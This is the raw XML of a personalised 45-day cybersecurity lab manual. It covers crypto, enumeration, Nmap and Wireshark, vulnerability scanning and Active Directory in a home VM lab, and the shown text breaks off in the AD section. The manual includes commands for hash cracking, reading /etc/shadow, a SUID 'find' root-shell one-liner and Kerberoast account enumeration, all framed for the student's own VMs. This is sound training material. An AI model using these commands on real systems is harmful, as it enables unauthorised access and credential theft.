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80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve">🛡️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CYBERSECURITY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COMPLETE LAB MANUAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="300" w:before="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With Commands, Labs &amp; Portfolio Outputs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Prepared for: Irfan Rafiq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MSc Computer Science  |  OTT Developer → Cybersecurity Analyst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38135"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Environment: Kali Linux + Windows 10 + Ubuntu Server (VirtualBox)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Start Date: 14 May 2026  |  45-Day Plan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4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📖 How to Use This Manual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manual covers every topic in your 45-day plan — original 24 lectures plus 8 critical missing topics. Each lab section follows the same structure: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OBJECTIVE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you will learn and be able to do after this lab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📚 THEORY SUMMARY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concepts from lecture — read before starting lab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⚙️ LAB SETUP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VMs to use, what to install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🔬 LAB STEPS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Step-by-step commands with expected output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KEY COMMANDS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Cheatsheet of all commands used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📁 PORTFOLIO OUTPUT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to save to GitHub after this lab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❓ SELF-QUIZ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questions — answer these before moving on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⚠️ IMPORTANT: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ALL labs must be done on your own VMs only. Never run attack tools on networks or systems you don't own. For Kali: use 192.168.x.x internal VirtualBox network only.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FOUNDATION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D0E8FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Days 1–7  |  Classes 1–7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br/>
              <w:t xml:space="preserve">1–2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Cryptography — Hashing, Encryption &amp; File Integrity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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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Understand the difference between hashing, encryption, and encoding. Practically use SHA256, MD5, GPG, and hashcat. Prove file integrity in a lab. This is foundational — everything in security touches crypto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📚 Theory Summary (Classes 1–3)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Plaintext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readable data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Ciphertext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Encrypted data — unreadable without key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One-way fingerprint of data (fixed length)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value added before hashing to prevent rainbow tables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key for encrypt &amp; decrypt (fast)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Asymmetric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keys: public to encrypt, private to decrypt (slow, for key exchange)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Symmetric — used for file/disk encryption (128/256 bit keys)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Asymmetric — used for HTTPS, digital signatures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Produces 128-bit hash — broken, never use for passwords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SHA256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Produces 256-bit hash — current standard for integrity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Encryption — only sender/receiver can read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Steganography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Hiding data inside another file (image/audio)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F3F00"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️ Exam Trap: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Hash is NOT encryption. Hash is one-way — you cannot reverse it. Encryption is two-way. MD5 is broken for security — still used for file checksums only.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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">⚙️ Lab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VM: Kali Linux (all commands run here unless noted)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Required: hashcat, john, gpg (all pre-installed on Kali)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working directory first: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Create your lab folder structure (run once)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mkdir -p ~/labs/01-crypto &amp;&amp; cd ~/labs/01-crypto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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps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 — Generate and compare hashes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Create a test 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echo 'Hello Irfan' &gt; test.txt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Generate MD5 and SHA256 hashes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md5sum test.txt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sha256sum test.txt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Expected output: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a1b2c3... test.txt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e3f4a5... test.txt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Now modify the file by ONE character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echo 'Hello irfan' &gt; test.txt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Re-hash — notice COMPLETELY different output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md5sum test.txt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sha256sum test.txt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THIS is the avalanche effect — key concept for interviews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 — Identify hash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Given a hash — what type is it?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MD5    = 32 hex characters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SHA1   = 40 hex characters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SHA256 = 64 hex characters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SHA512 = 128 hex characters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Use hashid to identify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hashid '5f4dcc3b5aa765d61d8327deb882cf99'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Output: [+] MD5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hashid 'e3b0c44298fc1c149afbf4c8996fb924'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Output: [+] SHA-256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Also try: hashcat --example-hashes | grep -A2 'MD5'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hashcat --example-hashes | head -60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 — Crack MD5 hashes with hashcat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First create a file with known MD5 hashes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echo -n 'password123' | md5sum | cut -d' ' -f1 &gt; hashes.txt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echo -n 'admin' | md5sum | cut -d' ' -f1 &gt;&gt; hashes.txt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echo -n 'qwerty' | md5sum | cut -d' ' -f1 &gt;&gt; hashes.txt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Check your hashes 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cat hashes.txt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Crack using rockyou wordlist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-m 0 = MD5 mode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-a 0 = dictionary attack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hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt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Show cracked results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hashcat -m 0 hashes.txt --show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If rockyou.txt is compressed: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gunzip /usr/share/wordlists/rockyou.txt.gz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 — Crack with John the Ripper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Create hash file for John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echo 'user1:5f4dcc3b5aa765d61d8327deb882cf99' &gt; john_hashes.txt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Run John with rockyou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john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 john_hashes.txt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Show cracked passwords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john --show john_hashes.txt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Also crack NTLM (Windows) hashes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echo -n 'Password1' | iconv -t utf-16le | openssl dgst -md4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This is how Windows stores passwords in SAM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 — GPG Encryption (Asymmetric)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Generate a GPG key pair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gpg --gen-key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Follow prompts: RSA, 3072 bit, name, email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Create a secret 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echo 'This is Irfan secret data' &gt; secret.txt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Encrypt it with your own public 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gpg --encrypt --recipient your@email.com secret.txt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Creates: secret.txt.gpg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View encrypted file — unreadable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cat secret.txt.gpg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Decrypt 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gpg --decrypt secret.txt.gpg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Output: 'This is Irfan secret data'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List your keys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gpg --list-keys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gpg --list-secret-keys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6 — Salting Demo (Python)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Run Python3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python3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Paste this code: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import hashlib, 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password = 'password123'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Without salt — same password = same hash (rainbow table vulnerable)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h1 = hashlib.md5(password.encode()).hexdigest()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h2 = hashlib.md5(password.encode()).hexdigest()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print('Without salt:', h1 == h2)  # True — DANGEROUS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With salt — same password = different hash each time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salt1 = os.urandom(16).hex()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salt2 = os.urandom(16).hex()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h3 = hashlib.sha256((salt1 + password).encode()).hexdigest()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h4 = hashlib.sha256((salt2 + password).encode()).hexdigest()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print('With salt:', h3 == h4)  # False — SAFE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print('Salt1 hash:', h3[:20]+'...')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print('Salt2 hash:', h4[:20]+'...')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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 Key Commands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md5sum file.txt           # MD5 hash of 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sha256sum file.txt        # SHA256 hash of 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sha512sum file.txt        # SHA512 hash of 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hashid 'hashvalue'        # Identify hash type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hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt   # Crack MD5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hashcat -m 1000 hashes.txt rockyou.txt   # Crack NTLM (Windows)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hashcat -m 1800 hashes.txt rockyou.txt   # Crack SHA-512crypt (Linux /etc/shadow)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hashcat -m 13100 hashes.txt rockyou.txt  # Crack Kerberoast TGS hashes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john --wordlist=rockyou.txt --format=raw-md5 hashes.txt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john --show hashes.txt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gpg --gen-key                            # Generate key pair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gpg --encrypt --recipient email file     # Encrypt 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gpg --decrypt file.gpg                   # Decrypt file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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /01-cryptography/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README.md — explains what you did and what you learned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screenshots/ — hash comparison, hashcat cracked output, gpg decrypt proof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salting-demo.py — your Python salting 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File-Integrity-Report.pdf — 1-page: what hashing is, why it matters, demo proof</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">❓ Self-Quiz (Answer before Day 3)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is the difference between MD5 and SHA256? Which should you use for password storage?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Your colleague says 'I encrypted the password with MD5.' What is wrong with this statement?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Why does adding a salt to a password before hashing make rainbow table attacks harder?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br/>
              <w:t xml:space="preserve">3–4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Networking Fundamentals + OS Security Enumeration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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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Map a network, understand port/service relationships, enumerate users and permissions on Windows and Linux. These skills are used in EVERY security assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📚 Theory Summary (Classes 4–7)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Explanation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TCP/IP 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layers: Application, Transport, Internet, Network Access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OSI Model (7 layers)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Physical, Data Link, Network, Transport, Session, Presentation, Application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22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— Secure Shell (remote admin)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80/443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/ HTTPS (web traffic)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445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SMB — Windows file sharing (EternalBlue target!)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3389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RDP — Remote Desktop Protocol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3306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database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21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FTP — File Transfer (cleartext — insecure)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CIA Triad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Confidentiality + Integrity + Availability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Account Control — Windows privilege prompt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User ID — Linux binary that runs as owner (PrivEsc vector)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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">⚙️ Lab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Kali Linux: for scanning and Linux commands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Windows 10 VM: for Windows enumeration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Ubuntu Server VM: as scan target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3 VMs on same VirtualBox Internal Network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Verify your lab network first — run on each VM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On Kali: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ip addr show eth0    # or ip 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Note your Kali IP: 192.168.X.X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On Ubuntu Server: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hostname -I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On Windows 10 (cmd.exe):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ipconfig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Test connectivity — from Kali ping all VMs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ping -c 3 192.168.X.X   # Ubuntu IP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ping -c 3 192.168.X.X   # Windows IP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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps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 — Network Discovery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Find all hosts on your VirtualBox network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nmap -sn 192.168.1.0/24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-sn = ping scan (no port scan), just find live hosts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Expected output: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Nmap scan report for 192.168.1.2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Host is up (0.001s latency).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Save your results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nmap -sn 192.168.1.0/24 -oN ~/labs/network-discovery.txt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cat ~/labs/network-discovery.txt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 — Linux User Enumeration (Ubuntu VM)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Run these on Ubuntu Server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Current user and privileges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whoami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groups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All users on system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cat /etc/passwd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Format: username:x:UID:GID:info:home:shell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UID 0 = root, UID 1000+ = regular users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Users with login shells (real users, not system accounts)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grep -E '/bin/bash|/bin/sh' /etc/passwd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Password hashes (need root)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sudo cat /etc/shadow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Format: username:$algorithm$salt$hash:...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$1$ = MD5 (old, weak)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$6$ = SHA-512 (current standard)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Sudo privileges of current user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sudo -l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Create test users (requires sudo)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sudo useradd -m testuser1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sudo useradd -m testuser2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sudo passwd testuser1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Add user to sudo group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sudo usermod -aG sudo testuser1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Verify group membership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groups testuser1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id testuser1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Check login history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last | head -20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lastlog | head -20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Auth log — shows SSH logins, sudo use, failures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sudo tail -50 /var/log/auth.log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sudo grep 'Failed password' /var/log/auth.log | head -10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 — Windows User Enumeration (Windows 10 VM)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Run cmd.exe as Administrator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Current user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whoami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whoami /all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All local users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net user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Details of specific user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net user Administrator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net user [YourUsername]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All local groups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net localgroup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Members of Administrators group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net localgroup Administrators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System info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systeminfo | findstr /B /C:'OS Name' /C:'OS Version' /C:'System Type'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Network config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ipconfig /all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Running processes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tasklist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Open ports/connections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netstat -ano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PID column — cross-reference with tasklist to find which process owns which port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Scheduled tasks (potential PrivEsc)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schtasks /query /fo LIST /v | findstr 'Task Name'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Windows Event Log — login events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Open Event Viewer: eventvwr.msc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Go to: Windows Logs &gt; Security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Filter by: Event ID 4624 (successful login), 4625 (failed login)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 — Find SUID Binaries on Linux (PrivEsc Preview)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SUID = runs as file owner regardless of who executes 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If owner is root = potential privilege escalation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Find all SUID binaries on system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find / -perm -u=s -type f 2&gt;/dev/null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Common legitimate SUID: /usr/bin/passwd, /usr/bin/sudo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Dangerous SUID: /bin/bash, /usr/bin/find, /usr/bin/vim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Example: if /usr/bin/find has SUID and owned by root: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find . -exec /bin/sh -p \; -quit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This gives you a root shell! (We will practice this in Day 34)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For now — just identify them and note them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find / -perm -u=s -type f 2&gt;/dev/null &gt; ~/labs/suid-binaries.txt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cat ~/labs/suid-binaries.txt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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 Key Commands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LINUX USER ENUMERATION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whoami &amp;&amp; id &amp;&amp; groups              # Current user info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cat /etc/passwd                     # All system users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sudo cat /etc/shadow                # Password hashes (root required)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sudo -l                             # Current user's sudo privileges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last | head -20                     # Login history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sudo tail -100 /var/log/auth.log    # Authentication log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find / -perm -u=s -type f 2&gt;/dev/null  # SUID binaries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WINDOWS USER ENUMERATION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whoami /all                         # Current user + SIDs + privileges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net user                            # All local users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net localgroup Administrators       # Admin group members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netstat -ano                        # Open ports + PID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tasklist /fi 'PID eq [PID]'         # Find process by PID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schtasks /query /fo LIST /v         # Scheduled tasks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NETWORK DISCOVERY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nmap -sn 192.168.1.0/24            # Ping sweep — find live hosts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arp -a                              # ARP cache — recently seen hosts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route -n                            # Routing table (Linux)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route print                         # Routing table (Windows)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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /02-os-security/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OS-Enumeration-Cheatsheet.pdf — Windows + Linux commands in one reference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screenshots/ — whoami output, /etc/shadow (sanitized), Event Viewer login events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br/>
              <w:t xml:space="preserve">5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⭐ Python for Security — Port Scanner &amp; Log Parser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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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Write 2 working Python security scripts: a port scanner and a log parser. These will be in your GitHub portfolio and will be asked about in every technical interview.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps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 — Simple TCP Port Scanner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Create the script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nano ~/labs/port_scanner.py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Paste this code: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#!/usr/bin/env python3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import socket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import sys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from datetime import datetime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def scan_port(host, port, timeout=1):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    try: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        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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        sock.settimeout(timeout)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        result = sock.connect_ex((host, port))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        sock.close()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        return result == 0  # 0 = success = port open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    except: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        return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def scan_range(host, start_port, end_port):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    print(f'\nScanning {host} from port {start_port} to {end_port}')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    print(f'Started at: {datetime.now()}')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    print('-' * 50)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    open_ports =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    for port in range(start_port, end_port + 1):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        if scan_port(host, port):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            try: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                service = socket.getservbyport(port)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            except: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                service = 'unknown'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            print(f'  [OPEN] Port {port:5d} — {service}')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            open_ports.append(port)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    print(f'\nTotal open ports: {len(open_ports)}')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    return open_ports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if __name__ == '__main__':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    target = input('Enter target IP: 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    scan_range(target, 1, 1024)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Run it against your Ubuntu VM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python3 ~/labs/port_scanner.py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Enter: [Ubuntu VM IP]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Compare with Nmap — results should match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nmap -p 1-1024 [Ubuntu IP]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 — Log Parser (Brute Force Detector)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nano ~/labs/log_parser.py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#!/usr/bin/env python3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import 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from collections import defaultdict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def parse_auth_log(logfile='/var/log/auth.log', threshold=5):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    """Find IPs with more than threshold failed SSH logins"""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    failed_logins = defaultdict(list)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    # Regex to match failed SSH login lines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    pattern = r'(\w+ \d+ \d+:\d+:\d+).*Failed password.*from (\d+\.\d+\.\d+\.\d+)'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    try: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        with open(logfile, 'r') as f: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            for line in f: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                match = re.search(pattern, line)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                if match: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                    timestamp = match.group(1)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                    ip = match.group(2)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                    failed_logins[ip].append(timestamp)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    except PermissionError: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        print('Need sudo: sudo python3 log_parser.py')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        return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    print(f'\n=== BRUTE FORCE DETECTION REPORT ===')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    print(f'Log file: {logfile}')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    print(f'Alert threshold: {threshold} failed attempts')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    print('-' * 50)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    alerts = {ip: times for ip, times in failed_logins.items() if len(times) &gt;= threshold}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    if alerts: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        print(f'[!] SUSPICIOUS IPs DETECTED:')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        for ip, times in sorted(alerts.items(), key=lambda x: len(x[1]), reverse=True):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            print(f'  IP: {ip:20s} — {len(times)} failed attempts')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            print(f'    First attempt: {times[0]}')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            print(f'    Last attempt:  {times[-1]}')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    else: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        print('[+] No suspicious activity found.')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if __name__ == '__main__':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    parse_auth_log()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Run with sudo (needs to read auth.log)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sudo python3 ~/labs/log_parser.py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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /00-python-scripts/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port_scanner.py with README explaining how it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log_parser.py with README + sample output screenshot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note: 'Can be extended to auto-block IPs via iptables'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br/>
              <w:t xml:space="preserve">6–7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Nmap Deep Dive + Wireshark Traffic Analysis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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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Master Nmap's most important flags. Capture and analyze real network traffic in Wireshark. Produce a professional Nmap scan report — your first portfolio deliverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Nmap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── BASIC SCANS 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Basic port scan (top 1000 ports)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nmap [Ubuntu_IP]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Scan ALL 65535 ports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nmap -p- [Ubuntu_IP]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Scan specific ports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nmap -p 22,80,443,445,3306 [Ubuntu_IP]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── SERVICE AND OS DETECTION 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Version detection (-sV) + OS detection (-O)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nmap -sV -O [Ubuntu_IP]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Aggressive scan — version, OS, scripts, traceroute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nmap -A [Ubuntu_IP]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── SCAN TYPES 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SYN scan (stealth, default with root) — doesn't complete TCP handshake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sudo nmap -sS [Ubuntu_IP]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UDP scan (slower — DNS, SNMP, DHCP use UDP)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sudo nmap -sU --top-ports 20 [Ubuntu_IP]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── NSE SCRIPTS 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Safe scripts for info gathering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nmap --script=http-title,http-headers [Ubuntu_IP]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nmap --script=ssl-cert,ssl-enum-ciphers [Ubuntu_IP]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nmap --script=smb-os-discovery [Windows_IP]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Vulnerability scripts (noisier — don't use on real targets)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nmap --script=vuln [Ubuntu_IP]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── TIMING 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T0=paranoid, T1=sneaky, T2=polite, T3=normal, T4=aggressive, T5=insane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nmap -T4 -sV [Ubuntu_IP]   # Faster but noisier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nmap -T2 -sV [Ubuntu_IP]   # Slower but quieter (evade IDS)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── OUTPUT FORMATS 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Normal output to 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nmap -sV -O [Ubuntu_IP] -oN ~/labs/nmap-normal.txt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XML output (parse with scripts)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nmap -sV -O [Ubuntu_IP] -oX ~/labs/nmap-output.xml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Grep-able output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nmap -sV [Ubuntu_IP] -oG ~/labs/nmap-grep.txt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All formats at once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nmap -sV -O -A [Ubuntu_IP] -oA ~/labs/nmap-full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── FULL PROFESSIONAL SCAN (use for reports) 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sudo nmap -sV -O -sC -p- --open -T4 [Ubuntu_IP] -oA ~/labs/03-va/nmap-full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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Wireshark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Start Wireshark on Kali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wireshark &amp;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Select your network interface (eth0 or the VirtualBox one)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Click the blue shark fin to start capturing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── GENERATE INTERESTING TRAFFIC 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In a SEPARATE terminal while Wireshark is running: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1. Generate a ping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ping -c 5 [Ubuntu_IP]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2. Generate a port scan (will look suspicious in Wireshark!)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nmap -sS [Ubuntu_IP]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3. Generate an SSH connection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ssh user@[Ubuntu_IP]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Stop capture in Wireshark — click the red square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── KEY WIRESHARK DISPLAY FILTERS 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Filter by IP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ip.addr == 192.168.1.X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Filter by protocol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tcp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udp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icmp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dns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http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Filter by port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tcp.port == 22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tcp.port == 80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tcp.port == 445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Find the nmap port scan — look for many SYN packets to different ports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tcp.flags.syn == 1 &amp;&amp; tcp.flags.ack ==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Find failed connections (RST = reset = port closed/refused)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tcp.flags.reset ==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Find DNS queries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dns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── ANALYZE THE PORT SCAN IN WIRESHARK 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You will see: many SYN packets to different destination ports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Closed ports: SYN → RST/ACK back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Open ports: SYN → SYN/ACK back (3-way handshake starts)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This is how IDS detects port scans!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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /03-vulnerability-assessment/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nmap-scan-report.pdf — professional format with findings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wireshark-filters-cheatsheet.pdf — screenshot + filter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nmap-full.xml and nmap-full.txt from your lab scan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2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VULNERABILITY ASSESSMENT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D0E8FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Days 8–14  |  Classes 11–13, 21–22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br/>
              <w:t xml:space="preserve">8–9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OpenVAS / GVM + Nessus — Full Vulnerability Scanning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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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professional vulnerability scans with OpenVAS and Nessus Essentials. Compare both tools. Write a professional VA report that is client-ready. This is your #1 freelance deliverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">⚙️ Lab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── OPENVAS/GVM SETUP ON KALI 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Update first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sudo apt update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Install GVM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sudo apt install gvm -y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Run setup (takes 15-30 minutes — downloads vulnerability feeds)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sudo gvm-setup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Start GVM services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sudo gvm-start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Get auto-generated admin password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sudo gvm-setup 2&gt;&amp;1 | grep 'Admin password'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OR check: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sudo cat /var/log/gvm/gvmd.log | grep -i password | tail -5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Access web interface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Open browser: https://127.0.0.1:9392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Accept the SSL certificate warning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Login: admin / [password from above]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── COMMON SETUP ISSUES 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If gvm-start fails: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sudo systemctl status postgresql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sudo systemctl start postgresql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sudo gvm-start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Check GVM is running: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sudo gvm-check-setup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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Running Your First Scan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In OpenVAS Web Interface (https://127.0.0.1:9392)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STEP 1: Create a Target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Scans &gt; Targets &gt; New Target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Name: Ubuntu-Lab-Server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Hosts: [Ubuntu_VM_IP]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Save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STEP 2: Create a Task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Scans &gt; Tasks &gt; New Task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Name: Lab-Ubuntu-Full-Scan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Scan Config: Full and Fast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Target: Ubuntu-Lab-Server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Save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STEP 3: Run the scan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Click the Play button next to your task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Wait 10-30 minutes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STEP 4: View Results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Click the task name when Status = Done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You see: Critical / High / Medium / Low / Info counts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STEP 5: Export Report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Click the task &gt; Reports &gt; Download as PDF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Also download as XML for your records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── UNDERSTANDING CVSS SCORES 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CVSS v3.1 Severity Ranges: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0.0       = None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0.1 - 3.9 = Low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4.0 - 6.9 = Medium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7.0 - 8.9 = High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9.0 - 10.0 = Critical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For each finding, look up the CVE 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https://nvd.nist.gov/vuln/search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Read: Description, CVSS Score, References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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Nessus Essentials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Register for free at: https://www.tenable.com/products/nessus/nessus-essentials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Download for Debian/Kali: Nessus-X.X.X-debian10_amd64.deb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Install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sudo dpkg -i Nessus-*.deb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sudo systemctl start nessusd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sudo systemctl enable nessusd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Access web interface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https://localhost:8834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Register with your activation code (from email)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Create a new Basic Network Scan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New Scan &gt; Basic Network Scan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Name: Lab-Comparison-Scan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Targets: [Ubuntu_VM_IP]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Launch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Compare Nessus results vs OpenVAS results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Note: which found more? different CVEs? different severity ratings?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Document the comparison — this is your portfolio piece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📝 Professional VA Report Format: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Executive Summary (non-technical, 1 paragraph) | Scope &amp; Methodology | Findings Table (CVE / Severity / Affected Host / Description / Fix) | Detailed Findings (1 page each for Critical/High) | Remediation Summary | Appendix (raw scan data). Use this format for every client report.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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 Key Commands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sudo gvm-setup       # First-time setup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sudo gvm-start       # Start GVM services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sudo gvm-stop        # Stop GVM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sudo gvm-check-setup # Verify installation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Access points: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OpenVAS: https://127.0.0.1:9392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Nessus:  https://localhost:8834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CVE lookup: https://nvd.nist.gov/vuln/search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CVSS calculator: https://www.first.org/cvss/calculator/3.1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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📁 Portfolio Output → /03-vulnerability-assessment/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VA-Report-v1.pdf — professional format, 3+ pages, executive summary + findings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Nessus-vs-OpenVAS-Comparison.pdf — table comparing both tool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cvss-calculation-notes.txt — your manual CVSS score for 1 finding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3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⭐ ACTIVE DIRECTORY (ADDED)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D0E8FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Days 15–18  |  Missing Topic — Critical for Lahore Jobs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br/>
              <w:t xml:space="preserve">15–18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Active Directory — Setup, Enumeration, Kerberoasting &amp; Defense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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 Objective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up a Windows Server AD lab, enumerate it as an attacker, perform Kerberoasting, then harden it as a defender. 70% of Lahore enterprise environments run AD — this is mandatory knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">📚 Theory Summary (Active Directory)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Controller (DC)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that manages authentication for the entire domain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Forest / Tree / Domain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Hierarchy: Forest &gt; Tree &gt; Domain. Company.com is a domain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 (Org Unit)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for organizing users/computers within domain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Policy Object — applies settings to users/computers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Kerberos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 protocol used by AD (tickets, not passwords)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Principal Name — identifies a service in Kerberos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TGT / TGS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 Granting Ticket / Ticket Granting Service — Kerberos tickets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NTLM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Older Windows auth protocol — hash can be reused in attacks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BloodHound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tool that maps AD attack paths visually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Kerberoasting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Extracting Kerberos service tickets and cracking offline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Pass-the-Hash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Using NTLM hash without knowing plaintext password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Admin Password Solution — randomizes local admin passwords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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">⚙️ Lab Setup — Windows Server 2022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Download Windows Server 2022 Evaluation (180 days free)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https://www.microsoft.com/en-us/evalcenter/download-windows-server-2022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Create new VM in VirtualBox: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Name: WinServer-DC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RAM: 2GB minimum (4GB recommended)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HDD: 50GB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Network: Same internal network as Kali + Win10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After Windows Server installs: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1. Set a static IP (Control Panel &gt; Network Adapter)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2. Set hostname: DC01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3. Set IP: 192.168.1.10 (or your range)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── PROMOTE TO DOMAIN CONTROLLER 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Server Manager &gt; Add Roles and Features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Role: Active Directory Domain Services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After install: click 'Promote this server to a domain controller'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Choose: Add a new forest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Root domain name: lab.local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DSRM password: [set a strong password]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Complete wizard and restart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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Day 15: AD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After Server is DC — run these in PowerShell as Administrator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Create test users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New-ADUser -Name 'Alice Smith' -SamAccountName alice -UserPrincipalName alice@lab.local -AccountPassword (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Enabled $true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New-ADUser -Name 'Bob Jones' -SamAccountName bob -UserPrincipalName bob@lab.local -AccountPassword (ConvertTo-SecureString 'Summer2024!' -AsPlainText -Force) -Enabled $true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New-ADUser -Name 'SVC SQL' -SamAccountName svc_sql -UserPrincipalName svc_sql@lab.local -AccountPassword (ConvertTo-SecureString 'Service@123' -AsPlainText -Force) -Enabled $true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Create a service account with SPN (Kerberoastable!)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Set-ADUser -Identity svc_sql -ServicePrincipalNames @{Add='MSSQLSvc/dc01.lab.local:1433'}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Create groups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New-ADGroup -Name 'IT Department' -GroupScope Global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Add-ADGroupMember -Identity 'IT Department' -Members alice, bob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Verify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Get-ADUser -Filter * | Select Name, SamAccountName, Enabled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Get-ADGroup -Filter * | Select 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Join Win10 VM to domain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On Win10: Control Panel &gt; System &gt; Change domain to: lab.local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DC IP must be Win Server IP in Win10 network settings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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔬 Lab Steps — Day 16: Enumeration from Kali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From Kali — enumerate the domain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── ENUM4LINUX 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enum4linux -a [WinServer_IP]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Shows: users, groups, shares, password policy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── IMPACKET TOOLS (pre-installed on Kali) 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Get all users from domain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GetADUsers.py -all -dc-ip [WinServer_IP] lab.local/alice:Password123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Find Kerberoastable accounts (have SPN)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GetUserSPNs.py lab.local/alice:Password123 -dc-ip [WinServer_IP]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── BLOODHOUND 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Install BloodHound on Kali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sudo apt install bloodhound neo4j -y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Start Neo4j (BloodHound database)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sudo neo4j start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Browse to: http://localhost:7474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Change default password: neo4j/neo4j to something stronger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Start BloodHound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bloodhound &amp;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Collect AD data — run SharpHound on Win10 domain-joined VM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Download SharpHound: https://github.com/BloodHoundAD/SharpHound/releases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Run on Win10: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.\SharpHound.exe -c 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Copy the output ZIP to Kali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Import into BloodHound: drag and drop the ZIP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Query: 'Find Shortest Paths to Domain Admins'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You will see the attack path from regular user to Domain Admin!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538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
